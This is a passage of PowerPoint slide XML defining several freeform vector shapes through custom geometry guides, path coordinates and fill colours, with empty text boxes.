          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T17" fmla="*/ 0 h 91"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T19" fmla="*/ 0 h 91"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T21" fmla="*/ 0 h 91"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T40" fmla="*/ 0 w 79"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T42" fmla="*/ 0 w 79"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T44" fmla="*/ 0 w 79"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T83" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T91" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T92" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T93" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T94" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T95" fmla="*/ 2147483647 h 91"/>
              <a:gd name="T96" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T97" fmla="*/ 2147483647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9"/>
              <a:gd name="T148" fmla="*/ 0 h 91"/>
              <a:gd name="T149" fmla="*/ 79 w 79"/>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9" h="91">
                <a:moveTo>
                  <a:pt x="78" y="4"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="78" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="4"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="333333"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10262" name="Freeform 343"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1568450" y="7519988"/>
            <a:ext cx="298450" cy="203200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T2" fmla="*/ 0 w 132"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T53" fmla="*/ 0 h 90"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T83" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T91" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T92" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T93" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T94" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T95" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T96" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T97" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T98" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T99" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T100" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T101" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T102" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T103" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T104" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T105" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T106" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T107" fmla="*/ 2147483647 h 9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2"/>
              <a:gd name="T163" fmla="*/ 0 h 90"/>
              <a:gd name="T164" fmla="*/ 132 w 132"/>
              <a:gd name="T165" fmla="*/ 90 h 9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2" h="90">
                <a:moveTo>
                  <a:pt x="1" y="67"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="67"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10263" name="Freeform 344"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1531937" y="7718425"/>
            <a:ext cx="217488" cy="73025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 96"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 96"/>
              <a:gd name="T3" fmla="*/ 0 h 32"/>
              <a:gd name="T4" fmla="*/ 0 w 96"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 96"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 96"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 96"/>
              <a:gd name="T16" fmla="*/ 0 h 32"/>
              <a:gd name="T17" fmla="*/ 96 w 96"/>
              <a:gd name="T18" fmla="*/ 32 h 32"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="96" h="32">
                <a:moveTo>
                  <a:pt x="96" y="12"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="12"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10264" name="Freeform 345"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1638300" y="7743825"/>
            <a:ext cx="95250" cy="31750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 42"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 42"/>
              <a:gd name="T3" fmla="*/ 0 h 14"/>
              <a:gd name="T4" fmla="*/ 0 w 42"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 42"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 42"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 42"/>
              <a:gd name="T16" fmla="*/ 0 h 14"/>
              <a:gd name="T17" fmla="*/ 42 w 42"/>
              <a:gd name="T18" fmla="*/ 14 h 14"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="42" h="14">
                <a:moveTo>
                  <a:pt x="42" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="6"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10265" name="Freeform 346"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1543050" y="7727950"/>
            <a:ext cx="63500" cy="22225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 28"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T2" fmla="*/ 0 w 28"/>
              <a:gd name="T3" fmla="*/ 0 h 10"/>
              <a:gd name="T4" fmla="*/ 0 w 28"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 28"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 28"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 28"/>
              <a:gd name="T16" fmla="*/ 0 h 10"/>
              <a:gd name="T17" fmla="*/ 28 w 28"/>
              <a:gd name="T18" fmla="*/ 10 h 10"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
